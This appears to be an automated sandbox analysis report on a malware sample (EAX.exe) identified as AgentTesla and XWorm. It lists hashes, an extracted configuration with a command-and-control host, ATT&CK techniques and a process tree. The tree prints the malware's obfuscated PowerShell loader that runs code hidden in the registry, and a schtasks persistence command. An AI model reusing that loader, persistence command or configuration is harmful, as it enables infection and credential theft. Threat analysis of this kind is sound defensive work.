agenttesla | f5423a76c3e4f5521fc2b20049e0c969cf98a68a47a460bc121835f3232ebc42

Analysis

max time kernel
150s
max time network
130s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
01/08/2024, 21:21

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

EAX.exe
Size

1.6MB
MD5

87461190cbbd2eb848b79b51181b743e
SHA1

6731e220d3bf6d1b798ca53634cfa27a8635282c
SHA256

f5423a76c3e4f5521fc2b20049e0c969cf98a68a47a460bc121835f3232ebc42
SHA512

7a8f8e3baceca70a93b4003976a64ee0bdcf55a6e5c8ecd453fbb74c4e18cedbf312d6b3db13d41c7d1bfc5e64c181aa9648e991093ff7a4d438b1297c9e8bde
SSDEEP

49152:oFxz9RXsYonyrEHBTlVD9EITaSgM+8ncGAV:oQYoHBTlVD9naSsscGA

Score

10^/10

agenttesla xworm discovery evasion execution keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

edition-eat.gl.at.ply.gg:13576

Mutex

5HJZFucWFdqrEGtt

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000700000001661e-31.dat	family_xworm
behavioral1/memory/2692-34-0x0000000000FD0000-0x0000000000FE0000-memory.dmp	family_xworm

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1760 created 432	1760	powershell.EXE	5

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

AgentTesla payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000016148-23.dat	family_agenttesla
behavioral1/memory/2084-26-0x0000000004FB0000-0x00000000051C6000-memory.dmp	family_agenttesla

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4s.lnk	x4ss.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4s.lnk	x4ss.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4m5tl.exe	EAX.exe

Executes dropped EXE 13 IoCs

pid	Process
2084	Creative EAX Setting.exe
2716	x4m5tl.exe
2692	x4ss.exe
2560	x4Shellcode.exe
476	services.exe
2564	alg.exe
2020	aspnet_state.exe
1460	mscorsvw.exe
1744	mscorsvw.exe
1644	elevation_service.exe
1076	GROOVE.EXE
2212	maintenanceservice.exe
1664	OSE.EXE

Loads dropped DLL 3 IoCs

pid	Process
2084	Creative EAX Setting.exe
2084	Creative EAX Setting.exe
476	services.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4s = "C:\\Users\\Admin\\AppData\\Roaming\\x4s"	x4ss.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1760	powershell.EXE

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\alg.exe	x4Shellcode.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\af0d48d876682ce6.bin	alg.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	GROOVE.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1760 set thread context of 2984	1760	powershell.EXE	46

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jdb.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\java.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\keytool.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\pack200.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\java.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\mip.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Oarpmany.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe	alg.exe
File opened for modification	C:\Program Files\Internet Explorer\ielowutil.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\xjc.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\ktab.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\servertool.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Application Installer.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOICONS.EXE	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\airappinstaller.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jhat.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\javaw.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\ODeploy.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\ExtExport.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\LICLUA.EXE	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\chrome_installer.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\notification_helper.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javah.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\klist.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\jabswitch.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\java-rmi.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\orbd.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\crashreporter.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\private_browsing.exe	alg.exe
File opened for modification	C:\Program Files\DVD Maker\DVDMaker.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\wsimport.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\jp2launcher.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\SmartTagInstall.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{DDB7E7A7-D625-45EC-93C8-C15199469555}\chrome_installer.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\ielowutil.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jps.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\klist.exe	alg.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen_service.log	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe	x4Shellcode.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe	alg.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe	alg.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen_service.log	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenservicelock.dat	mscorsvw.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mscorsvw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GROOVE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OSE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Creative EAX Setting.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x4Shellcode.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Creative EAX Setting.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Creative EAX Setting.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	Creative EAX Setting.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 5052e8d858e4da01	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	GROOVE.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
568	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1760	powershell.EXE
1760	powershell.EXE
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe
2984	dllhost.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	2692	x4ss.exe
Token: SeTakeOwnershipPrivilege	2560	x4Shellcode.exe
Token: SeShutdownPrivilege	1460	mscorsvw.exe
Token: SeShutdownPrivilege	1744	mscorsvw.exe
Token: SeDebugPrivilege	1760	powershell.EXE
Token: SeDebugPrivilege	1760	powershell.EXE
Token: SeDebugPrivilege	2984	dllhost.exe
Token: SeAuditPrivilege	864	svchost.exe
Token: SeDebugPrivilege	2692	x4ss.exe
Token: SeShutdownPrivilege	1460	mscorsvw.exe
Token: SeShutdownPrivilege	1744	mscorsvw.exe
Token: SeShutdownPrivilege	1460	mscorsvw.exe
Token: SeShutdownPrivilege	1460	mscorsvw.exe
Token: SeShutdownPrivilege	1744	mscorsvw.exe
Token: SeShutdownPrivilege	1744	mscorsvw.exe
Token: SeAuditPrivilege	864	svchost.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 2336 wrote to memory of 2084	2336	EAX.exe	31
PID 2336 wrote to memory of 2084	2336	EAX.exe	31
PID 2336 wrote to memory of 2084	2336	EAX.exe	31
PID 2336 wrote to memory of 2084	2336	EAX.exe	31
PID 2336 wrote to memory of 2716	2336	EAX.exe	32
PID 2336 wrote to memory of 2716	2336	EAX.exe	32
PID 2336 wrote to memory of 2716	2336	EAX.exe	32
PID 2716 wrote to memory of 2692	2716	x4m5tl.exe	33
PID 2716 wrote to memory of 2692	2716	x4m5tl.exe	33
PID 2716 wrote to memory of 2692	2716	x4m5tl.exe	33
PID 2716 wrote to memory of 2560	2716	x4m5tl.exe	34
PID 2716 wrote to memory of 2560	2716	x4m5tl.exe	34
PID 2716 wrote to memory of 2560	2716	x4m5tl.exe	34
PID 2716 wrote to memory of 2560	2716	x4m5tl.exe	34
PID 324 wrote to memory of 1760	324	taskeng.exe	40
PID 324 wrote to memory of 1760	324	taskeng.exe	40
PID 324 wrote to memory of 1760	324	taskeng.exe	40
PID 1760 wrote to memory of 2984	1760	powershell.EXE	46
PID 1760 wrote to memory of 2984	1760	powershell.EXE	46
PID 1760 wrote to memory of 2984	1760	powershell.EXE	46
PID 1760 wrote to memory of 2984	1760	powershell.EXE	46
PID 1760 wrote to memory of 2984	1760	powershell.EXE	46
PID 1760 wrote to memory of 2984	1760	powershell.EXE	46
PID 1760 wrote to memory of 2984	1760	powershell.EXE	46
PID 1760 wrote to memory of 2984	1760	powershell.EXE	46
PID 1760 wrote to memory of 2984	1760	powershell.EXE	46
PID 2984 wrote to memory of 432	2984	dllhost.exe	5
PID 2984 wrote to memory of 476	2984	dllhost.exe	6
PID 2984 wrote to memory of 492	2984	dllhost.exe	7
PID 2984 wrote to memory of 500	2984	dllhost.exe	8
PID 2984 wrote to memory of 608	2984	dllhost.exe	9
PID 2984 wrote to memory of 688	2984	dllhost.exe	10
PID 2984 wrote to memory of 764	2984	dllhost.exe	11
PID 2692 wrote to memory of 568	2692	x4ss.exe	47
PID 2692 wrote to memory of 568	2692	x4ss.exe	47
PID 2692 wrote to memory of 568	2692	x4ss.exe	47
PID 2984 wrote to memory of 828	2984	dllhost.exe	12
PID 2984 wrote to memory of 864	2984	dllhost.exe	13
PID 2984 wrote to memory of 976	2984	dllhost.exe	15
PID 2984 wrote to memory of 284	2984	dllhost.exe	16
PID 2984 wrote to memory of 920	2984	dllhost.exe	17
PID 2984 wrote to memory of 1080	2984	dllhost.exe	18
PID 2984 wrote to memory of 1096	2984	dllhost.exe	19
PID 2984 wrote to memory of 1168	2984	dllhost.exe	20
PID 2984 wrote to memory of 1204	2984	dllhost.exe	21
PID 2984 wrote to memory of 2044	2984	dllhost.exe	23
PID 2984 wrote to memory of 1468	2984	dllhost.exe	24
PID 2984 wrote to memory of 276	2984	dllhost.exe	25
PID 2984 wrote to memory of 2272	2984	dllhost.exe	26
PID 2984 wrote to memory of 1916	2984	dllhost.exe	27
PID 2984 wrote to memory of 2440	2984	dllhost.exe	30
PID 2984 wrote to memory of 2084	2984	dllhost.exe	31
PID 2984 wrote to memory of 2564	2984	dllhost.exe	35
PID 2984 wrote to memory of 2020	2984	dllhost.exe	36
PID 2984 wrote to memory of 324	2984	dllhost.exe	37
PID 2984 wrote to memory of 1460	2984	dllhost.exe	38
PID 2984 wrote to memory of 1744	2984	dllhost.exe	39
PID 2984 wrote to memory of 1644	2984	dllhost.exe	42
PID 2984 wrote to memory of 1076	2984	dllhost.exe	43
PID 2984 wrote to memory of 1664	2984	dllhost.exe	45

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{39c4674c-63e5-4713-84a0-7fb902a16f2a}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2984

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:476
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:608
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:2044
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:276
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:688
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  PID:764
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:828
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1168
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:864
- - C:\Windows\system32\wbem\WMIADAP.EXE
    wmiadap.exe /F /T /R
    3⤵
    PID:2440
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {BDB4309F-F2F4-479E-BF75-D668A82F7F60} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](120)+''+[Char](52)+''+[Char](115)+''+[Char](116)+'a'+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1760
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:976
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:284
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:920
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1080
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1096
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1468
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2272
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:1916
- C:\Windows\System32\alg.exe
  C:\Windows\System32\alg.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:2564
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
  2⤵
  - Executes dropped EXE
  PID:2020
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:1460
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1744
- C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
  2⤵
  - Executes dropped EXE
  PID:1644
- C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE
  "C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE" /auditservice
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:1076
- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
  "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
  2⤵
  - Executes dropped EXE
  PID:2212
- C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
  "C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1664

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:492

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:500

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1204
- C:\Users\Admin\AppData\Local\Temp\EAX.exe
  "C:\Users\Admin\AppData\Local\Temp\EAX.exe"
  2⤵
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:2336
- - C:\Users\Admin\AppData\Local\Temp\Creative EAX Setting.exe
    "C:\Users\Admin\AppData\Local\Temp\Creative EAX Setting.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    PID:2084
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4m5tl.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4m5tl.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2716
  - - C:\Users\Admin\AppData\Local\Temp\x4ss.exe
      "C:\Users\Admin\AppData\Local\Temp\x4ss.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2692
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4s" /tr "C:\Users\Admin\AppData\Roaming\x4s"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:568
  - - C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
      "C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE

Filesize
706KB

MD5
2c7124b24636f3b052177e520e4a0879

SHA1
a124f26ea663572d5229d14e510eb42dd8011dfd

SHA256
b20701cf923db1feb6aeb3abd0cea38dc389d8232e9155deba6aba0215df8f8c

SHA512
a5f3ef504d349e12025ca0d0d2d17386c54650c74990a7893dd67257a4c1cd99b97df351e08d6f8adf24876f57301fdaca836349c650ea224ae80486744aae15

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE

Filesize
30.1MB

MD5
91b0f4b2f38f9a6784f2133313fc0f1e

SHA1
fba7acf11504d5ad1611e265da95297de844d375

SHA256
c3119e307a449f3d744bfc021b446f0adc678e4c54d00583f0491287c72abc31

SHA512
1b621db0acbc4f41955ba0981f40accaf0fe936b40e094a88f68bc9a160eab0140d23d19051074fbb02e904e666c1741eeeb6a3cced423ea9124482f4bc2dc70

Download Submit
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Filesize
781KB

MD5
a26bbdeffa04b352b8ef5a4c9366c15e

SHA1
cfe0eab4b8621ca86fc473328f6458176b14e2c7

SHA256
505ab06523e2624445e2a503ca7edf148ec84747ba4ebaf7c96e106ed92b02cc

SHA512
3010a6687bf410619c1826f04d2565b521f699c7164eb42d49ef161d82660c4b4d02377671efbd130068413fade8ff41a66e2ca73aee478047a539418ca08bcb

Download Submit
